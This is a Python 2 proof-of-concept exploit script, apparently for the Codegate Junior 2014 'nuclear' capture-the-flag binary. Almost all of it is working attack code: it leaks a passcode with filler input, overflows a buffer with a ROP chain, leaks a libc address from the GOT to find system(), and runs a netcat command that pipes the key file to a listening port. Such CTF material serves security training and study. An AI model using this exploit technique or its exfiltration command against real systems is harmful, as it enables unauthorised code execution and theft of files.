#!/usr/bin/python
from socket import *
from struct import *
from time import *
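def p(x):
    """Pack *x* as one 32-bit little-endian word (an i386 stack slot).

    Used to serialise every address and argument of the ROP chain.
    """
    return pack("<L", x)


def up(x):
    """Unpack a 32-bit little-endian word.

    *x* must be exactly 4 bytes, otherwise ``struct`` raises; callers slice
    the received buffer to 4 bytes before calling this.
    """
    return unpack("<L", x)[0]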
# One TCP connection to the target service, opened at import time and shared
# as the global ``s`` by every stage below.  (Python 2 script: all payloads
# are built as str.)
s = create_connection(("127.0.0.1", 1129))
# ---------------------------------------------------------------------------
# Target-specific values for the Codegate Junior 2014 "nuclear" binary.
# 32-bit build with fixed (non-PIE) addresses; every number below is tied to
# that exact binary and its libc and must be re-derived for any other build.
# ---------------------------------------------------------------------------

# pop;pop;pop;ret gadget.  Entering one byte later presumably skips the first
# pop, so ppr discards two stack words and pr none; the chain uses them to
# drop call arguments between consecutive calls.
pppr = 0x804917d
ppr, pr = pppr + 1, pppr + 2

# GOT slot of the *sockopt function: the chain sends its contents back to us,
# which leaks a libc address.
sockopt_got = 0x0804B00C

# PLT stubs.  Not referenced by the chain below; kept as a reference only.
recv_plt = 0x080488E0
send_plt = 0x08048900

# Wrapper functions inside the binary that the chain calls instead of the raw
# PLT stubs.  Their exact semantics (argument order, how the fd is used) are
# a property of the target binary and are not visible in this script.
recv_inner = 0x08048A6F
send_inner = 0x08048A0D

# Writable scratch area (presumably .bss) where the command string is staged.
freespace = 0x0804b088

# Distance from the leaked *sockopt pointer to system() in the target's libc.
# Build-specific: recompute from the target's libc symbol table otherwise.
offset = 0xb2860

# Command run by the final system() call: ships the flag file to port 8989 on
# the target host, so a listener (e.g. `nc -l -p 8989`) must be running there.
cmd = "cat key | nc localhost 8989"
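def leak_passcode():
    """Drive the service's "target" menu entry and harvest the passcode it leaks.

    Conversation as scripted here: read the banner, send "target", read the
    prompt, send 512 filler bytes, discard one reply, then read the reply that
    carries the passcode.  Why 512 bytes is the right length is a property of
    the target binary and is not derivable from this script.

    The passcode reply is assumed to look like ``<label>: <passcode>``: the
    text between the first ':' and the next ':' (if any) is taken and its
    first character (the separator space) dropped.  Note that a single
    recv() may return a partial TCP message; the PoC does not reassemble.

    Uses the module-level socket ``s``.  Raises RuntimeError when the final
    reply holds no ':' (the original PoC raised a bare IndexError there).
    """
    s.recv(1024)                 # banner
    s.sendall("target")          # sendall: a short send() would corrupt the dialogue
    s.recv(1024)                 # prompt
    s.sendall("a" * 512)         # filler that provokes the leak
    s.recv(1024)                 # first reply, not needed
    reply = s.recv(1024)
    fields = reply.split(":")
    if len(fields) < 2:
        raise RuntimeError("no passcode in reply: %r" % (reply,))
    # Drop the single separator byte (a space) that follows the ':'.
    return fields[1][1:]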
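def sockoptgot_leak(ps):
    """Pass the "launch" passcode check and run the ROP chain; return system()'s address.

    ``ps`` is the passcode from leak_passcode().  After "launch" and the
    passcode are accepted, a line of 528 filler bytes followed by the chain
    overflows the service's buffer; the first chain entry is executed as the
    saved return address.  The chain is three calls, each followed by a
    pop-n-ret gadget that discards its arguments:

    1. send_inner(4, sockopt_got) -- presumably writes the 4-byte GOT slot
       back to this socket, leaking a libc pointer.
    2. recv_inner(4, freespace, len(cmd)+1) -- the caller's next send (the
       command plus its NUL) lands in ``freespace``.
    3. recv_inner(4, recv_inner, 4), then a call to recv_inner with return
       address 0xdeadbeef and argument ``freespace``.  The caller sends
       system()'s address at this point, so stage 3 is presumably meant to
       patch that last call slot into system(freespace).

    The leaked pointer minus ``offset`` (a libc-build-specific delta) is the
    address of system().  Uses the module-level socket ``s`` and the address
    constants defined at module level.  Raises RuntimeError when fewer than
    4 bytes come back for the leak (the original unpack() would have raised
    an opaque struct.error).
    """
    s.sendall("launch")
    s.recv(1024)
    s.sendall(ps + "\n")
    s.recv(1024)

    # One dword per entry, in stack order; bytes are identical to the original PoC.
    chain = [
        # stage 1: leak the GOT slot
        send_inner, ppr, 4, sockopt_got,
        # stage 2: stage the command string in freespace
        recv_inner, pppr, 4, freespace, len(cmd) + 1,
        # stage 3: read 4 more bytes, then the final call.
        # NOTE(review): the buffer argument here is recv_inner's own .text
        # address, which does not fit the "patch the return slot" reading
        # above -- confirm recv_inner's real semantics against the binary
        # before relying on this stage.
        recv_inner, pppr, 4, recv_inner, 4,
        recv_inner, 0xdeadbeef, freespace,
    ]
    payload = "a" * 528 + "".join(p(word) for word in chain)
    s.sendall(payload + "\n")    # sendall: the chain must arrive in full
    s.recv(1024)                 # whatever the service prints for the line
    sleep(1)                     # let the chain run before reading the leak
    leak = s.recv(1024)
    if len(leak) < 4:
        raise RuntimeError("short leak (%d bytes): %r" % (len(leak), leak))
    recved = up(leak[:4])
    print("this is socketopt : " + hex(recved))
    system = recved - offset
    print("this is system : " + hex(system))
    return system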
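if __name__ == "__main__":
    # Stage order matters: the chain planted by sockoptgot_leak() is waiting
    # on the two sends below.
    passcode = leak_passcode()
    system_addr = sockoptgot_leak(passcode)   # renamed from `sys`, which shadowed the stdlib module name
    # Stage 2 reads len(cmd)+1 bytes: the command plus its NUL.  The extra
    # "\n" is sent as in the original PoC; whether the target's recv helper
    # consumes it is a property of that binary.
    s.sendall(cmd + "\x00" + "\n")
    # Stage 3 reads 4 bytes: the computed address of system().
    s.sendall(p(system_addr))
    print("[*]boom boom boom")
    s.close()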
2014년 5월 15일 목요일
Codegate junior 2014 nuclear exploit
POC exploit code